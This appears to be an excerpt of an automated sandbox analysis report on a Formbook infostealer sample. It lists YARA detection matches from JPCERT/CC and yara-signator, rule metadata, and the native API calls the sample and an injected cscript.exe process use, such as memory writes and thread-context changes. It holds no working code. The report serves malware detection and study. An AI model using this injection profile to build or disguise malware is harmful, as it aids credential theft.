            Source: 10.2.FB_5E87.tmp.exe.1080000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 10.0.FB_5E87.tmp.exe.1080000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 10.0.FB_5E87.tmp.exe.1080000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 8.2.New_1007572_021.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 8.2.New_1007572_021.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0.2.New_1007572_021.exe.3bc9930.2.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0.2.New_1007572_021.exe.3bc9930.2.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0.2.New_1007572_021.exe.3d7bea0.5.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0.2.New_1007572_021.exe.3d7bea0.5.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0.2.New_1007572_021.exe.3d06480.4.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0.2.New_1007572_021.exe.3d06480.4.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000013.00000002.926228324.0000000004F0F000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000013.00000002.926228324.0000000004F0F000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000013.00000002.925005416.0000000000278000.00000004.00000020.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000013.00000002.925005416.0000000000278000.00000004.00000020.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0000000A.00000002.821727953.0000000001081000.00000020.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0000000A.00000002.821727953.0000000001081000.00000020.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0000000A.00000002.821846658.00000000012B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0000000A.00000002.821846658.00000000012B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000008.00000002.740535210.0000000000404000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000008.00000002.740535210.0000000000404000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000013.00000002.925127682.0000000000490000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000013.00000002.925127682.0000000000490000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000013.00000002.926114786.0000000004BA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000013.00000002.926114786.0000000004BA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0000000A.00000002.821488799.0000000000E10000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0000000A.00000002.821488799.0000000000E10000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000013.00000002.925530735.00000000031B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000013.00000002.925530735.00000000031B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000000.00000002.739038576.0000000003BCD000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000000.00000002.739038576.0000000003BCD000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0000000A.00000000.740219963.0000000001081000.00000020.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0000000A.00000000.740219963.0000000001081000.00000020.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000000.00000002.739831969.0000000003EBC000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000000.00000002.739831969.0000000003EBC000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000000.00000002.739343756.0000000003D06000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000000.00000002.739343756.0000000003D06000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exe, type: DROPPEDMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exe, type: DROPPEDMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exeCode function: 10_2_0109A100 NtAllocateVirtualMemory,
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exeCode function: 10_2_0109A050 NtClose,
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exeCode function: 10_2_01099F20 NtCreateFile,
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exeCode function: 10_2_01099FD0 NtReadFile,
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exeCode function: 10_2_0109A04C NtClose,
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exeCode function: 10_2_0109A0FA NtAllocateVirtualMemory,
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exeCode function: 10_2_01099F1A NtCreateFile,
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exeCode function: 10_2_01099FCA NtReadFile,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048D95D0 NtClose,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048D9540 NtReadFile,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048D96D0 NtCreateKey,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048D96E0 NtFreeVirtualMemory,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048D9650 NtQueryValueKey,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048D9660 NtAllocateVirtualMemory,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048D9780 NtMapViewOfSection,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048D9FE0 NtCreateMutant,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048D9710 NtQueryInformationToken,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048D9840 NtDelayExecution,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048D9860 NtQuerySystemInformation,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048D99A0 NtCreateSection,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048D9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048D9A50 NtCreateFile,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048D95F0 NtQueryInformationFile,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048D9520 NtWaitForSingleObject,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048DAD30 NtSetContextThread,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048D9560 NtWriteFile,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048D9610 NtEnumerateValueKey,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048D9670 NtQueryInformationProcess,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048D97A0 NtUnmapViewOfSection,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048DA710 NtOpenProcessToken,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048D9730 NtQueryVirtualMemory,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048D9760 NtOpenProcess,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048DA770 NtOpenThread,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048D9770 NtSetInformationFile,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048D98A0 NtWriteVirtualMemory,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048D98F0 NtReadVirtualMemory,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048D9820 NtEnumerateKey,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048DB040 NtSuspendThread,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048D99D0 NtCreateProcessEx,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048D9950 NtQueueApcThread,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048D9A80 NtOpenDirectoryObject,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048D9A00 NtProtectVirtualMemory,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048D9A10 NtQuerySection,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048D9A20 NtResumeThread,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048DA3B0 NtGetContextThread,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048D9B00 NtSetValueKey,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_031CA100 NtAllocateVirtualMemory,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_031CA050 NtClose,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_031C9F20 NtCreateFile,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_031C9FD0 NtReadFile,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_031CA04C NtClose,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_031CA0FA NtAllocateVirtualMemory,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_031C9F1A NtCreateFile,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_031C9FCA NtReadFile,
            Source: C:\Users\user\Desktop\New_1007572_021.exeCode function: 0_2_0109E494
            Source: C:\Users\user\Desktop\New_1007572_021.exeCode function: 0_2_0109F580
            Source: C:\Users\user\Desktop\New_1007572_021.exeCode function: 0_2_0109F590
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exeCode function: 10_2_0109D166
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exeCode function: 10_2_01081030
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exeCode function: 10_2_0109E376
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exeCode function: 10_2_01082D90
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exeCode function: 10_2_0109D773
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exeCode function: 10_2_0109BFA6
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exeCode function: 10_2_01082FB0
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exeCode function: 10_2_01089E30
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exeCode function: 10_2_0109E6D5
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048A841F
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0495D466
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048C2581
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_049625DD
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048AD5E0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04962D07
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04890D20
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04961D55
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04962EF7
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0495D616
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048B6E30
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04961FF1
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048AB090
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048C20A0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_049620A8
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_049628EC
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04951002
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0489F900
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048B4120
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_049622AE
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048CEBB0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0495DBD2
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04962B28
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_031CE376
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_031CD166
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_031CD773
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_031B2FB0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_031CBFA6
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_031B9E30
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_031CE6D5
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_031B2D90
            Source: C:\Windows\SysWOW64\cscript.exeCode function: String function: 0489B150 appears 35 times
            Source: FB_5908.tmp.exe.8.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: FB_5908.tmp.exe.8.drStatic PE information: No import functions for PE file found
            Source: FB_5E87.tmp.exe.8.drStatic PE information: No import functions for PE file found
            Source: New_1007572_021.exe, 00000000.00000002.747317256.0000000007940000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameYyezikludvdagjmvrozekhz.dll" vs New_1007572_021.exe
            Source: New_1007572_021.exe, 00000000.00000002.746272769.0000000007420000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs New_1007572_021.exe
            Source: New_1007572_021.exe, 00000000.00000002.738790533.0000000002C7C000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameclrjit.dllT vs New_1007572_021.exe
            Source: New_1007572_021.exe, 00000000.00000002.738790533.0000000002C7C000.00000004.00000001.sdmpBinary or memory string: OriginalFilename vs New_1007572_021.exe
            Source: New_1007572_021.exe, 00000000.00000002.737740321.00000000010B0000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs New_1007572_021.exe
            Source: New_1007572_021.exe, 00000000.00000002.739038576.0000000003BCD000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameBindStub.exe vs New_1007572_021.exe
            Source: New_1007572_021.exe, 00000008.00000002.740535210.0000000000404000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameBindStub.exe vs New_1007572_021.exe
            Source: New_1007572_021.exe, 00000008.00000002.743239571.0000000002FD0000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs New_1007572_021.exe
            Source: New_1007572_021.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
            Source: 0.2.New_1007572_021.exe.3eb8b30.6.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0.2.New_1007572_021.exe.3eb8b30.6.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 10.2.FB_5E87.tmp.exe.1080000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 10.2.FB_5E87.tmp.exe.1080000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 10.0.FB_5E87.tmp.exe.1080000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 10.0.FB_5E87.tmp.exe.1080000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 8.2.New_1007572_021.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 8.2.New_1007572_021.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0.2.New_1007572_021.exe.3bc9930.2.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0.2.New_1007572_021.exe.3bc9930.2.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0.2.New_1007572_021.exe.3d7bea0.5.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0.2.New_1007572_021.exe.3d7bea0.5.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0.2.New_1007572_021.exe.3d06480.4.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0.2.New_1007572_021.exe.3d06480.4.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000013.00000002.926228324.0000000004F0F000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000013.00000002.926228324.0000000004F0F000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000013.00000002.925005416.0000000000278000.00000004.00000020.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000013.00000002.925005416.0000000000278000.00000004.00000020.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0000000A.00000002.821727953.0000000001081000.00000020.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0000000A.00000002.821727953.0000000001081000.00000020.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0000000A.00000002.821846658.00000000012B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0000000A.00000002.821846658.00000000012B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000008.00000002.740535210.0000000000404000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000008.00000002.740535210.0000000000404000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000013.00000002.925127682.0000000000490000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000013.00000002.925127682.0000000000490000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000013.00000002.926114786.0000000004BA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000013.00000002.926114786.0000000004BA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0000000A.00000002.821488799.0000000000E10000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0000000A.00000002.821488799.0000000000E10000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000013.00000002.925530735.00000000031B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000013.00000002.925530735.00000000031B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000000.00000002.739038576.0000000003BCD000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000000.00000002.739038576.0000000003BCD000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
